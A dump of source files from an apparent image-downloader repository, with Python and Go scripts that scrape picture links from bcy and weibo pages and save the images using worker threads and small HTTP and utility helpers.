@timelib.Timelog\n def download_now():\n path = timelib.Showtime(r\"$year-$mon-$day--$hour-$min-$sec\")\n os.mkdir(path)\n log(path, json.dumps(logdata))\n with open(path+\"/\"+path+\"_url.txt\", \"w\") as url_file:\n url_file.write(json.dumps(dict({\"mobile\": url, \"origan\": key})))\n if len(jpg_list) > 2:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, jpg_url_de_iterator]]*3))\n else:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*2, [[path, jpg_url_de_iterator]]*2))\n return None\n\n\ndef rec(q: Queue):\n for line in sys.stdin:\n q.put(line.replace(\"\\n\", \"\"))\n\n\ndef work(q: Queue):\n while True:\n if not q.empty():\n key = q.get()\n Main(key)\n\n\nif __name__ == \"__main__\":\n q = Queue()\n threading.Thread(target=rec, args=(q,)).start()\n w = threading.Thread(target=work, args=(q,))\n w.start()\n w.join()\n exit()\n" }, { "alpha_fraction": 0.5989257097244263, "alphanum_fraction": 0.6154879331588745, "avg_line_length": 22.030927658081055, "blob_id": "e6811a0602fc65bfe911f838c6bf0019abbd9d95", "content_id": "aaa9317bdd1c7ca8b1e2cd13371cf476d71c068c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2234, "license_type": "permissive", "max_line_length": 66, "num_lines": 97, "path": "/pd_go/bcy.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\tWorker \"pd_go/worker\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar w sync.WaitGroup\n\nfunc main() {\n\tq := Worker.NewQueue()\n\tfmt.Println(\"bcy photo downloader is working ...\")\n\tfor i := 1; i < 5; i++ {\n\t\tgo Worker.Work(q, int32(i))\n\t\tfmt.Printf(\"Worker[%d] has waitting ...\\n\", i)\n\t}\n\tfor {\n\t\tinputUrl := \"\"\n\t\tfmt.Scanln(&inputUrl)\n\t\tif inputUrl[:4] != \"http\" {\n\t\t\tWorker.Repair(inputUrl, q)\n\t\t\tcontinue\n\t\t}\n\t\tbody, e := Worker.GET(inputUrl, nil)\n\t\tif e != 200 {\n\t\t\tfmt.Printf(\"Get Page Error. Status Code %d\\n\", e)\n\t\t}\n\t\t//txt, _ := utf8.DecodeRune(body)\n\t\tvar imageList []string\n\t\tWorker.ProtectRun(func() {\n\t\t\timageList = getImageList(body)\n\t\t})\n\t\tif len(imageList) == 0 {\n\t\t\tfmt.Println(\"No image link.\")\n\t\t\tcontinue\n\t\t}\n\t\tlogData := make(map[string]string, 0)\n\n\t\ttimeStr := time.Now().Format(\"2006-01-02--15-04-05\")\n\t\tos.Mkdir(timeStr, 0644)\n\t\tif strings.Contains(inputUrl, \"?\") {\n\t\t\tsaveToFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr),\n\t\t\t\t[]byte(inputUrl[:strings.LastIndex(inputUrl, \"?\")]))\n\t\t} else {\n\t\t\tsaveToFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr),\n\t\t\t\t[]byte(inputUrl))\n\t\t}\n\t\tfor i := 0; i < len(imageList); i++ {\n\t\t\tlogData[strconv.Itoa(i)] = imageList[i]\n\t\t\tq.AppendValue([]string{strconv.Itoa(i), imageList[i], timeStr})\n\t\t}\n\t\tfmt.Printf(\"Enqueue %d task(s) in the queue.\", len(imageList))\n\t\tlogDataJson, _ := json.Marshal(logData)\n\t\tsaveToFile(fmt.Sprintf(\"%s/%s__log.txt\", timeStr, timeStr),\n\t\t\tlogDataJson)\n\t\t//fmt.Println(inputUrl)\n\t}\n}\n\nfunc getImageList(txt []byte) []string {\n\timageList := make([]string, 0)\n\tr := regexp.MustCompile(\"\\\\\\\\\\\"multi\\\\\\\\\\\":(\\\\[[^\\\\]]+\\\\])\")\n\n\trawJson := r.FindStringSubmatch(string(txt))[1]\n\n\tjsons := make([]map[string]interface{}, 0)\n\n\ts, e := strconv.Unquote(fmt.Sprintf(\"\\\"%s\\\"\", rawJson))\n\t////s,e := strconv.Unquote(rawJson)\n\tif e != nil {\n\t\tfmt.Println(e.Error())\n\t}\n\trawJson = s\n\n\terr := json.Unmarshal([]byte(rawJson), &jsons)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t}\n\n\tfor _, v := range jsons {\n\t\timageList = append(imageList, v[\"original_path\"].(string))\n\t}\n\treturn imageList\n}\nfunc saveToFile(path string, body []byte) {\n\tioutil.WriteFile(path, body, 0644)\n}\n" }, { "alpha_fraction": 0.6187800765037537, "alphanum_fraction": 0.6243980526924133, "avg_line_length": 29.414634704589844, "blob_id": "00c7381670999233fd2b07d826d0bf8d57b3d7f1", "content_id": "4d79c8870886d15799796f5ceef321bc5f3954ae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1246, "license_type": "permissive", "max_line_length": 87, "num_lines": 41, "path": "/Threadinglib.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import threading,time\ndef Multithreading_Run(function=[],functionkey=[]):\n \"\"\"function : which function(def) need to run ,must be a list\n functionkey : key of function,must be a bivariate table\"\"\"\n subthreadinglist=[\"\"]*len(function)\n \n i=0\n while i < len(subthreadinglist):\n subthreadinglist[i] = threading.Thread(target=function[i], args=functionkey[i])\n i+=1\n for i in subthreadinglist:\n time.sleep(0.1)\n i.start()\n return subthreadinglist\n \ndef Delay_Threading_To_Exit(subthreadinglist=[],Delaytime=1,tips=False):\n \"\"\"subthreadinglist: which list of need to delay\n Delaytime: Delay seconds\n tips: True to print Finished in the end \"\"\"\n i=0\n while i<len(subthreadinglist):\n if subthreadinglist[i].is_alive():\n time.sleep(Delaytime)\n else:\n i+=1\n if tips:\n print(\"Finished\")\n return True\n \ndef Check_Threading_isalive(subthreadinglist=[]):\n \"\"\"subthreadinglist: which need to check \"\"\"\n threadingstatus=[]\n for i in subthreadinglist:\n if i.is_alive():\n threadingstatus+=[True]\n else:\n threadingstatus+=[False]\n return threadingstatus\n \nif __name__ == \"__main__\":\n pass" }, { "alpha_fraction": 0.557079553604126, "alphanum_fraction": 0.5699514746665955, "avg_line_length": 17.51171875, "blob_id": "03e109764d8c7e5c8d32d24742851d0b7253daec", "content_id": "bbfa3e90017b6c4f99f2c528a113047e6fee7376", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 5319, "license_type": "permissive", "max_line_length": 104, "num_lines": 256, "path": "/pd_go/Libs/Libs.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "package Libs\n\nimport (\n\t\"bufio\"\n\t\"bytes\"\n\t\"crypto/sha1\"\n\t\"encoding/hex\"\n\t\"fmt\"\n\t\"io\"\n\t\"log\"\n\t\"os\"\n\t\"os/exec\"\n\t\"reflect\"\n\t\"runtime\"\n)\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n// 20201\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n\nfunc LibsXClear__20201() {\n\tswitch runtime.GOOS {\n\tcase \"windows\":\n\t\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\tcase \"darwin\":\n\t\tfallthrough\n\tcase \"linux\":\n\t\tcmd := exec.Command(\"clear\")\n\t\tcmd.Stdout = os.Stdout\n\t\tcmd.Run()\n\t}\n}\n\nfunc LibsXIsFile__20201(path string) bool {\n\ts, err := os.Stat(path)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn !s.IsDir()\n}\n\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n// History\n/////////////////////////////////////////////////////////////////////////////////////////////////////\n\nfunc LibsXRangeInt(args ...int) chan int {\n\tif l := len(args); l < 1 || l > 3 {\n\t\tfmt.Println(\"error args length, xRangeInt requires 1-3 int arguments\")\n\t}\n\tvar start, stop int\n\tvar step int = 1\n\tswitch len(args) {\n\tcase 1:\n\t\tstop = args[0]\n\t\tstart = 0\n\tcase 2:\n\t\tstart, stop = args[0], args[1]\n\tcase 3:\n\t\tstart, stop, step = args[0], args[1], args[2]\n\t}\n\n\tch := make(chan int)\n\tgo func() {\n\t\tif step > 0 {\n\t\t\tfor start < stop {\n\t\t\t\tch <- start\n\t\t\t\tstart = start + step\n\t\t\t}\n\t\t} else {\n\t\t\tfor start > stop {\n\t\t\t\tch <- start\n\t\t\t\tstart = start + step\n\t\t\t}\n\t\t}\n\t\tclose(ch)\n\t}()\n\n\treturn ch\n}\n\nfunc LibsXClear() {\n\tcmd := exec.Command(\"cmd\", \"/c\", \"cls\")\n\tcmd.Stdout = os.Stdout\n\tcmd.Run()\n}\n\n// 判断所给路径文件/文件夹是否存在\nfunc LibsXExists(path string) bool {\n\t_, err := os.Stat(path) //os.Stat获取文件信息\n\tif err != nil {\n\t\tif os.IsExist(err) {\n\t\t\treturn true\n\t\t}\n\t\treturn false\n\t}\n\treturn true\n}\n\n// 判断所给路径是否为文件夹\nfunc LibsXIsDir(path string) bool {\n\ts, err := os.Stat(path)\n\tif err != nil {\n\t\treturn false\n\t}\n\treturn s.IsDir()\n}\n\n// 判断所给路径是否为文件\nfunc LibsXIsFile(path string) bool {\n\treturn !LibsXIsDir(path)\n}\n\nfunc LibsXSha1File(filePath string) []byte {\n\tf, err := os.Open(filePath)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer f.Close()\n\n\th := sha1.New()\n\tif _, err := io.Copy(h, f); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn h.Sum(nil)\n}\n\nfunc LibsXSha1FileString(filePath string) string {\n\tf, err := os.Open(filePath)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer f.Close()\n\n\th := sha1.New()\n\tif _, err := io.Copy(h, f); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\treturn hex.EncodeToString(h.Sum(nil))\n}\n\nfunc LibsXexecCommand(commandName string, params []string) bool {\n\t//函数返回一个*Cmd,用于使用给出的参数执行name指定的程序\n\tcmd := exec.Command(commandName, params...)\n\n\t//显示运行的命令\n\t//fmt.Println(cmd.Args)\n\t//StdoutPipe方法返回一个在命令Start后与命令标准输出关联的管道。Wait方法获知命令结束后会关闭这个管道,一般不需要显式的关闭该管道。\n\tstdout, err := cmd.StdoutPipe()\n\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn false\n\t}\n\n\tcmd.Start()\n\t//创建一个流来读取管道内内容,这里逻辑是通过一行一行的读取的\n\treader := bufio.NewReader(stdout)\n\n\t//实时循环读取输出流中的一行内容\n\tfor {\n\t\tline, err2 := reader.ReadString('\\n')\n\t\tif err2 != nil || io.EOF == err2 {\n\t\t\tbreak\n\t\t}\n\t\tfmt.Println(line)\n\t}\n\n\t//阻塞直到该命令执行完成,该命令必须是被Start方法开始执行的\n\tcmd.Wait()\n\treturn true\n}\n\nfunc LibsXExecShell(commandName string, params []string) {\n\t// stdout,stderr\n\t//函数返回一个*Cmd,用于使用给出的参数执行name指定的程序\n\tcmd := exec.Command(commandName, params...)\n\n\t//读取io.Writer类型的cmd.Stdout,再通过bytes.Buffer(缓冲byte类型的缓冲器)将byte类型转化为string类型(out.String():这是bytes类型提供的接口)\n\tvar out bytes.Buffer\n\tw := bytes.NewBuffer(nil)\n\tcmd.Stderr = w\n\tcmd.Stdout = &out\n\n\t//Run执行c包含的命令,并阻塞直到完成。 这里stdout被取出,cmd.Wait()无法正确获取stdin,stdout,stderr,则阻塞在那了\n\tcmd.Run()\n\n\touts, ws := out.String(), w.String()\n\tif ws != \"\" {\n\t\tfmt.Println(ws)\n\t} else {\n\t\tfmt.Println(outs)\n\t}\n}\n\nfunc LibsXContains(array interface{}, val interface{}) (index int) {\n\tindex = -1\n\tswitch reflect.TypeOf(array).Kind() {\n\tcase reflect.Slice:\n\t\t{\n\t\t\ts := reflect.ValueOf(array)\n\t\t\tfor i := 0; i < s.Len(); i++ {\n\t\t\t\tif reflect.DeepEqual(val, s.Index(i).Interface()) {\n\t\t\t\t\tindex = i\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsStrings(array []string, val string) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsFloat64(array []float64, val float64) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsBools(array []bool, val bool) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n\nfunc LibsXContainsInt64(array []int64, val int64) (index int) {\n\tindex = -1\n\tfor i := 0; i < len(array); i++ {\n\t\tif array[i] == val {\n\t\t\tindex = i\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n}\n" }, { "alpha_fraction": 0.49157965183258057, "alphanum_fraction": 0.5025261044502258, "avg_line_length": 34.35118865966797, "blob_id": "5e94ca644971d664b4c8a0544cdfc5090f0a0e78", "content_id": "b02648a24f1ae79b36f72b802301c59b064dd4ba", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5938, "license_type": "permissive", "max_line_length": 153, "num_lines": 168, "path": "/url_lib.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import time , http.client , re , sys\n\nclass url_lib:\n def __init__(self,url=\"url str\"):\n if url[:4] == \"http\":\n self.url=url\n else:\n self.url=\"\"\n self.Headers={\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\",\n }\n \n def Get(self,key=[[\"key\",\"value\"]],port=80,url=None):\n if not url:\n url=self.url\n HTTPS_FLAG=False\n if url[-1]!=\"?\":\n url+=\"?\"\n if r\"http://\" in url:\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n elif r\"https://\" in url:\n host=re.compile(r\"https://[^/]*\").findall(url)[0].replace(\"https://\",\"\")\n port=443\n HTTPS_FLAG=True\n for i in key:\n url +=\"&\" + i[0] + \"=\" + i[1]\n if HTTPS_FLAG:\n h=http.client.HTTPSConnection(host,port)\n else:\n h=http.client.HTTPConnection(host,port)\n h.request(\"GET\",url,headers=self.Headers)\n return h.getresponse()\n\n def Post(self,data={\"keyname\":\"keyword\",},port=80,url=None):\n if not url:\n url=self.url\n HTTPS_FLAG=False\n if r\"http://\" in url:\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n elif r\"https://\" in url:\n host=re.compile(r\"https://[^/]*\").findall(url)[0].replace(\"https://\",\"\")\n port=443\n HTTPS_FLAG=True\n post_data_str = urlencode(data)\n\n if HTTPS_FLAG:\n h=http.client.HTTPSConnection(host,port)\n else:\n h=http.client.HTTPConnection(host,port)\n h.request(\"POST\",url,post_data_str,headers=self.Headers)\n return h.getresponse()\n \n def Head(self,port=80,url=None):\n url=self.url\n host=re.compile(r\"http://[^/]*\").findall(url)[0].replace(\"http://\",\"\")\n h=http.client.HTTPConnection(host,port)\n h.request(\"HEAD\",url,headers=self.Headers)\n res=h.getresponse()\n h.close();h=None\n return res.getheaders()\n\n\n\n_ALWAYS_SAFE = frozenset(b'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n b'abcdefghijklmnopqrstuvwxyz'\n b'0123456789'\n b'_.-')\n_ALWAYS_SAFE_BYTES = bytes(_ALWAYS_SAFE)\ndef quote(string, safe='/', encoding=None, errors=None):\n if isinstance(string, str):\n if not string:\n return string\n if encoding is None:\n encoding = 'utf-8'\n if errors is None:\n errors = 'strict'\n string = string.encode(encoding, errors)\n else:\n if encoding is not None:\n raise TypeError(\"quote() doesn't support 'encoding' for bytes\")\n if errors is not None:\n raise TypeError(\"quote() doesn't support 'errors' for bytes\")\n return quote_from_bytes(string, safe)\n\ndef quote_plus(string, safe='', encoding=None, errors=None):\n if ((isinstance(string, str) and ' ' not in string) or\n (isinstance(string, bytes) and b' ' not in string)):\n return quote(string, safe, encoding, errors)\n if isinstance(safe, str):\n space = ' '\n else:\n space = b' '\n string = quote(string, safe + space, encoding, errors)\n return string.replace(' ', '+')\n\ndef quote_from_bytes(bs, safe='/'):\n if not isinstance(bs, (bytes, bytearray)):\n raise TypeError(\"quote_from_bytes() expected bytes\")\n if not bs:\n return ''\n if isinstance(safe, str):\n safe = safe.encode('ascii', 'ignore')\n else:\n safe = bytes([c for c in safe if c < 128])\n if not bs.rstrip(_ALWAYS_SAFE_BYTES + safe):\n return bs.decode()\n try:\n quoter = _safe_quoters[safe]\n except KeyError:\n _safe_quoters[safe] = quoter = Quoter(safe).__getitem__\n return ''.join([quoter(char) for char in bs])\n\ndef urlencode(query, doseq=False, safe='', encoding=None, errors=None,\n quote_via=quote_plus):\n\n if hasattr(query, \"items\"):\n query = query.items()\n else:\n try:\n if len(query) and not isinstance(query[0], tuple):\n raise TypeError\n except TypeError:\n ty, va, tb = sys.exc_info()\n raise TypeError(\"not a valid non-string sequence \"\n \"or mapping object\").with_traceback(tb)\n\n l = []\n if not doseq:\n for k, v in query:\n if isinstance(k, bytes):\n k = quote_via(k, safe)\n else:\n k = quote_via(str(k), safe, encoding, errors)\n\n if isinstance(v, bytes):\n v = quote_via(v, safe)\n else:\n v = quote_via(str(v), safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n for k, v in query:\n if isinstance(k, bytes):\n k = quote_via(k, safe)\n else:\n k = quote_via(str(k), safe, encoding, errors)\n\n if isinstance(v, bytes):\n v = quote_via(v, safe)\n l.append(k + '=' + v)\n elif isinstance(v, str):\n v = quote_via(v, safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n try:\n # Is this a sufficient test for sequence-ness?\n x = len(v)\n except TypeError:\n # not a sequence\n v = quote_via(str(v), safe, encoding, errors)\n l.append(k + '=' + v)\n else:\n # loop over the sequence\n for elt in v:\n if isinstance(elt, bytes):\n elt = quote_via(elt, safe)\n else:\n elt = quote_via(str(elt), safe, encoding, errors)\n l.append(k + '=' + elt)\n return '&'.join(l)" }, { "alpha_fraction": 0.47103825211524963, "alphanum_fraction": 0.47759562730789185, "avg_line_length": 32.814815521240234, "blob_id": "e4a3bf434108a342d120e15dd5dd43dbc2da1db3", "content_id": "196a826c575cf08326fa94ea93e40fef4ddd5690", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 915, "license_type": "permissive", "max_line_length": 71, "num_lines": 27, "path": "/weibo_0.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "import url_lib , re ,timelib ,os\n\nub = url_lib.url_lib()\nwhile True: \n ub.url = input(\"url \")\n with open(\"Cookie.txt\",\"r\") as c: \n ub.Headers[\"Cookie\"]=c.read()\n txt=ub.Get().read().decode(\"utf-8\")\n jpg_list = re.compile(r'[^%\\\\\\/\\.]*\\.jpg\\\\\">').findall(txt)\n @timelib.Timelog\n def download_now():\n pre_url_str=\"http://wx3.sinaimg.cn/large/\"\n path=timelib.Showtime(\"$year-$mon-$day--$hour-$min-$sec\")\n os.system(\"mkdir \"+path)\n n=1\n for i in jpg_list :\n ub.url=pre_url_str+i[:-3]\n try:\n photo=ub.Get().read()\n with open(path+\"/\"+str(n)+\".jpg\" ,\"wb\" ) as photo_file:\n photo_file.write(photo)\n except IOError:\n print(IOError,\"\\n\",str(n)+\" file fail\")\n n+=1\n continue\n print(n,\" file is downloaded.\")\n n+=1\n\n\n" }, { "alpha_fraction": 0.5838509202003479, "alphanum_fraction": 0.6052795052528381, "avg_line_length": 22.165468215942383, "blob_id": "91f647afca5b0e18419e538da02c0b13f200f754", "content_id": "a3ac3564ea40cd614649ff7f2d7b31c54430bcf7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3244, "license_type": "permissive", "max_line_length": 108, "num_lines": 139, "path": "/pd_go/worker/worker.go", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "package Worker\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"net/http\"\n\t\"pd_go/Libs\"\n\t\"runtime\"\n\t\"strings\"\n\t\"sync\"\n\t\"time\"\n)\n\nvar lock sync.Mutex\n\ntype Queue struct {\n\tdata [][]string\n\tlength int\n}\n\nfunc NewQueue() *Queue {\n\treturn &Queue{data: [][]string{}, length: 0}\n}\nfunc (q *Queue) AppendValue(s []string) {\n\tlock.Lock()\n\t(*q).data = append((*q).data, s)\n\t(*q).length++\n\tlock.Unlock()\n}\nfunc (q *Queue) getOne() []string {\n\tlock.Lock()\n\tvar temp []string\n\t//fmt.Println(len(q.data))\n\t//if len((*q).data) > 0 {\n\tif (*q).length > 0 {\n\t\ttemp = (*q).data[0]\n\t\t(*q).data = (*q).data[1:]\n\t\t(*q).length--\n\t}\n\tlock.Unlock()\n\treturn temp\n}\nfunc (q *Queue) isNil() bool {\n\treturn (*q).length == 0\n}\n\nfunc Work(q *Queue, WorkId int32) {\n\tfor {\n\t\taUrl := (*q).getOne()\n\t\tif aUrl != nil {\n\t\t\tfmt.Printf(\"Worker[%d] receviced a task.\\n\", WorkId)\n\n\t\t\ttimeStr := aUrl[2]\n\t\t\t// timeStr:=time.Now().Format(\"2006-01-02--15-04-05\")\n\t\t\t// os.Mkdir(timeStr,0644)\n\t\t\t// ioutil.WriteFile(fmt.Sprintf(\"%s/%s__url.txt\", timeStr, timeStr), []byte(url), 0644)\n\t\t\tres, err := GET(aUrl[1], nil)\n\t\t\tif err != 200 {\n\t\t\t\tfmt.Printf(\"HTTP Error: Code [%d]\\n\", err)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tioutil.WriteFile(\n\t\t\t\tfmt.Sprintf(\"%s/%s__%s.%s\", timeStr, timeStr, aUrl[0], aUrl[1][strings.LastIndex(aUrl[1], \".\")+1:]),\n\t\t\t\tres, 0644,\n\t\t\t)\n\t\t\tfmt.Printf(\"Worker[%d] finished a task.\\t%d task(s) left in the queue\\n\", WorkId, (*q).length)\n\t\t}\n\t}\n}\n\nfunc Repair(folder string, q *Queue) {\n\trawLog, err := ioutil.ReadFile(fmt.Sprintf(\"%s/%s__log.txt\", folder, folder))\n\tvar logJson map[string]string\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\terr = json.Unmarshal(rawLog, &logJson)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn\n\t}\n\tfor k, v := range logJson {\n\t\t//fmt.Printf(fmt.Sprintf(\"%s/%s__%s.%s\", folder, folder, k, v[strings.LastIndex(v, \".\")+1:]))\n\t\tif Libs.LibsXExists(fmt.Sprintf(\"%s/%s__%s.%s\", folder, folder, k, v[strings.LastIndex(v, \".\")+1:])) {\n\t\t\tdelete(logJson, k)\n\t\t} else {\n\t\t\t(*q).AppendValue([]string{k, v, folder})\n\t\t}\n\t}\n\tfmt.Printf(\"Repair: %d was enqueued.\\n\", len(logJson))\n}\n\nfunc GET(url string, headers map[string]string) ([]byte, int) {\n\tclient := &http.Client{Timeout: 5 * time.Second}\n\treqest, err := http.NewRequest(\"GET\", url, nil) //建立一个请求\n\tif err != nil {\n\t\tfmt.Println(\"Fatal error \", err.Error())\n\t\treturn []byte(\"\"), 0\n\t}\n\t//Add Header\n\treqest.Header.Add(\"User-Agent\", \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0\")\n\tif headers != nil {\n\t\tfor k, v := range headers {\n\t\t\treqest.Header.Add(k, v)\n\t\t}\n\t}\n\tresponse, err := client.Do(reqest)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn []byte(\"\"), 0\n\t}\n\tdefer response.Body.Close()\n\t// cookies := response.Cookies() //遍历cookies\n\t//for _, cookie := range cookies {\n\t//\tfmt.Println(\"cookie:\", cookie)\n\t//}\n\n\tresponseBody, _ := ioutil.ReadAll(response.Body)\n\tCode := response.StatusCode\n\t//if err1 != nil {\n\t//\t// handle error\n\t//}\n\t//fmt.Println(string(response_body)) //网页源码\n\treturn responseBody, Code\n}\nfunc ProtectRun(entry func()) {\n\tdefer func() {\n\t\terr := recover()\n\t\tswitch err.(type) {\n\t\tcase runtime.Error:\n\t\t\tfmt.Println(\"runtime error:\", err)\n\t\tdefault:\n\t\t\tfmt.Println(\"error:\", err)\n\t\t}\n\t}()\n\tentry()\n}\n" }, { "alpha_fraction": 0.5265794396400452, "alphanum_fraction": 0.5452268123626709, "avg_line_length": 29.709402084350586, "blob_id": "e7aa83e444319fb3f6836e0170179f388349f943", "content_id": "881ee85fa94c2ccd2f13c5a275434d01f191d491", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3593, "license_type": "permissive", "max_line_length": 140, "num_lines": 117, "path": "/bcy.py", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "# version : v1.42\nimport url_lib\nimport re\nimport timelib\nimport Threadinglib\nimport sys\nimport json\nimport os\nimport subprocess as sp\nfrom collections import deque\n\n\ndef download_beta(path=\"\", iter=\"\"):\n d_ub = url_lib.url_lib()\n while iter:\n iter_data = iter.popleft()\n d_ub.url = iter_data[1]\n # print(d_ub.url)\n try:\n with open(path+\"/\"+path+\"__\"+str(iter_data[0])+os.path.splitext(iter_data[1])[-1], \"wb\", buffering=5*1024*1024+1) as photo_file:\n photo = d_ub.Get()\n photo_data = photo.read(5*1024*1024)\n while photo_data:\n photo_file.write(photo_data)\n photo_file.flush()\n photo_data = photo.read(5*1024*1024)\n print(iter_data[0], \"file is downloaded.\")\n except IOError:\n print(iter_data[0], \" file is fail.\")\n\n\ndef repair(path):\n import os\n with open(path+\"/\"+path+\"_url.txt\", \"r\") as url_file:\n ub.url = url_file.read()\n txt = ub.Get().read().decode(\"utf-8\")\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n raise \"not list\"\n jpg_url_enu = list()\n logdata = str(\"\\n\\n\")\n for i in enumerate(jpg_list):\n jpg_url_enu.append([i[0]+1, i[1]])\n logdata += str(i[0]+1)+\" : \"+i[1] + \"\\n\"\n re_download = []\n for i in jpg_url_enu:\n if not os.path.exists(path+\"/\"+path+\"__\"+str(i[0])+\".jpg\"):\n re_download += [i]\n re_download_de_iterator = deque(re_download)\n @timelib.Timelog\n def repair_now():\n log(path, logdata)\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, re_download_de_iterator]]*3))\n\n\ndef get_jpg_list(txt=\"\"):\n txtline = re.compile(\"JSON\\.parse[^\\n]+\\n\").findall(txt)[0][12:-4]\n txtline = txtline.encode(\"raw_unicode_escape\").decode(\"unicode_escape\")\n data = json.loads(txtline)\n jpg_list = []\n for i in data[\"detail\"][\"post_data\"][\"multi\"]:\n jpg_list += [i[\"original_path\"]]\n return jpg_list\n\n\ndef log(path, data):\n try:\n if data.replace(\"\\n\", \"\"):\n open(path+\"/\"+path+\"__log.log\", \"a\").write(data)\n print(\"log succ\")\n except IOError:\n print(\"Error: \"+IOError)\n\n\nub = url_lib.url_lib()\nwhile True:\n key = input(\"\\nbcy_url \")\n if key[:4] == \"http\":\n ub.url = key\n else:\n repair(key)\n continue\n txt = ub.Get()\n if txt.getcode() != 200:\n print(\"Error:\", txt.getcode())\n continue\n txt = txt.read().decode(\"utf-8\")\n\n jpg_list = get_jpg_list(txt)\n if not jpg_list:\n continue\n\n logdata = dict()\n jpg_url_enu = list()\n for i in enumerate(jpg_list):\n jpg_url_enu.append([i[0]+1, i[1]])\n logdata[str(i[0]+1)] = i[1]\n jpg_url_de_iterator = deque(jpg_url_enu)\n\n # @timelib.Timelog\n def download_now():\n path = timelib.Showtime(r\"$year-$mon-$day--$hour-$min-$sec\")\n os.mkdir(path)\n log(path, logdata)\n with open(path+\"/\"+path+\"_url.txt\", \"w\") as url_file:\n if \"?\" in ub.url:\n url_file.write(ub.url[:ub.url.index(\"?\")])\n else:\n url_file.write(ub.url)\n if len(jpg_list) > 4:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*4, [[path, jpg_url_de_iterator]]*4))\n else:\n Threadinglib.Delay_Threading_To_Exit(Threadinglib.Multithreading_Run(\n [download_beta]*3, [[path, jpg_url_de_iterator]]*3))\n download_now()\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 6.333333492279053, "blob_id": "1c9ea36dff64be36e86d7582bc362860390b1732", "content_id": "dbfa23865d099a1daf7ce71892046d04920cf34d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 22, "license_type": "permissive", "max_line_length": 12, "num_lines": 3, "path": "/pd_go/go.mod", "repo_name": "AnestLarry/photo_downloader", "src_encoding": "UTF-8", "text": "module pd_go\n\ngo 1.14\n" } ]
10
silviodonato/DelphesSkim-old
https://github.com/silviodonato/DelphesSkim-old
764b1737604aa0f7ef075301275275d819995e80
a0a47bf1b8e16b9717b50db13e2a792ba1585f53
